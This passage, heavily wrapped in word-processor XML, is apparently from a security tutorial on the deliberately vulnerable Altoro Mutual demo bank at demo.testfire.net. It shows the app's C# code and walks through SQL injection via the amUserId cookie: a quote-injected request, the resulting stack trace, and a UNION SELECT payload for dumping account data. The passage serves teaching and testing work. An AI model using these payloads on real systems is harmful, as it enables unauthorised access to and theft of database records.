              <w:t xml:space="preserve">            promoText += cLimit;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            promoText += "!&lt;/td&gt;&lt;/tr&gt;";</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            promoText += "&lt;tr&gt;&lt;td&gt;Click &lt;a href='apply.aspx";</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            promoText += "'&gt;Here&lt;/a&gt; to apply.&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;";</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            promo.Visible = true;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            promo.Text = promoText;</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private void CheckPromo(string strUserId)</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if (Request.Cookies["amCreditOffer"] != null)</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HttpCookie CreditOffer = Request.Cookies["amCreditOffer"];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">              WritePromo(CreditOffer["CardType"], CreditOffer["Limit"], CreditOffer["Interest"]);</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protected String GetSessionValue(String key)</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if (Request.Cookies["amUserId"].Value==Session["userId"].ToString())</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return Session[key].ToString();</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else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return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#region Web Form Designer generated code</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">        override protected void OnInit(EventArgs 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 CODEGEN: This call is required by the ASP.NET Web Form Designer.</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InitializeComponent();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            base.OnInit(e);</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 &lt;summary&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">        /// Required method for Designer support - do not modify</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">        /// the contents of this method with the code editor.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">        /// &lt;/summary&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">        private void InitializeComponent()</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 xml:space="preserve">        #endregion</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="257" w:before="257"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Semibold" w:eastAsia="Source Sans Pro Semibold" w:hAnsi="Source Sans Pro Semibold" w:cs="Source Sans Pro Semibold"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="25"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>SQL injection using Cookie data</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="21" w:name="_Tocomed5taltgz5"/>
      <w:bookmarkEnd w:id="21"/>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After login following request will be sent to the server:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="600362"/>
        <w:tblW w:w="14355" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="329"/>
        <w:gridCol w:w="14025"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2986"/>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r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14025"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GET /bank/main.aspx HTTP/1.1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Host: demo.testfire.net</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.6) Gecko/20100101 Firefox/10.0.6</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Accept-Language: en-us,en;q=0.5</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Proxy-Connection: keep-alive</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Referer: http://demo.testfire.net/bank/login.aspx</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Cookie: ASP.NET_SessionId=2ks1fprgokgkd0jthbms3d25; amSessionId=62733112717; amUserInfo=UserName=YWRtaW4=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b w:val="true"/>
                <w:color w:val="999999"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>&amp;Password=YWRtaW4=;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> amUserId=1</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A look at the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>GetAccounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the source code reveals that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> is actually some data from the cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>amUserId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> and never gets sanitized. Let’s have some fun:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="197885"/>
        <w:tblW w:w="6464" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="329"/>
        <w:gridCol w:w="6134"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1399"/>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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6134"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GET /bank/main.aspx HTTP/1.1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>...</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>amUserInfo=UserName=YWRtaW4=&amp;Password=YWRtaW4=; amUserId=1'</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i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>amUserId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> was changed and the whole GET request was sent again to the server. The response was quite informative:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="120061"/>
        <w:tblW w:w="183209" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="329"/>
        <w:gridCol w:w="182880"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1929"/>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r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18288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An Error Has Occurred</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Summary:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Syntax error in string in query expression 'userid = 1''.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Error Message:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>System.Data.OleDb.OleDbException: Syntax error in string in query expression 'userid = 1''. at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr) at System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult(tagDBPARAMS dbParams, Object&amp; executeResult) at System.Data.OleDb.OleDbCommand.ExecuteCommandText(Object&amp; executeResult) at System.Data.OleDb.OleDbCommand.ExecuteCommand(CommandBehavior behavior, Object&amp; executeResult) at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method) at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior) at System.Data.OleDb.OleDbCommand.System.Data.IDbCommand.ExecuteReader(CommandBehavior behavior) at System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, String srcTable) at Altoro.Default.GetAccounts(String userId) in d:downloadsAltoroMutual_v6websitankmain.aspx.cs:line 54 at Altoro.Default.Page_Load(Object sender, EventArgs e) in d:downloadsAltoroMutual_v6websitankmain.aspx.cs:line 31 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)</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Ahhh, there we go! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Bold" w:eastAsia="Source Sans Pro Bold" w:hAnsi="Source Sans Pro Bold" w:cs="Source Sans Pro Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Another SQL injection vulnerability!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> You could now dump some data:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="245596"/>
        <w:tblW w:w="10710" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="302"/>
        <w:gridCol w:w="10393"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1622"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="302"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r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10393"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GET /bank/main.aspx HTTP/1.1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Host: demo.testfire.net</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>...</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>amUserInfo=UserName=YWRtaW4=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b w:val="true"/>
                <w:color w:val="999999"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>&amp;Password=YWRtaW4=;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> amUserId=2 union select accountid, acct_type from accounts;--</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 xml:space="preserve">You could use this vulnerability to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Bold" w:eastAsia="Source Sans Pro Bold" w:hAnsi="Source Sans Pro Bold" w:cs="Source Sans Pro Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">dump the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Bold" w:eastAsia="Source Sans Pro Bold" w:hAnsi="Source Sans Pro Bold" w:cs="Source Sans Pro Bold"/>
          <w:b w:val="true"/>
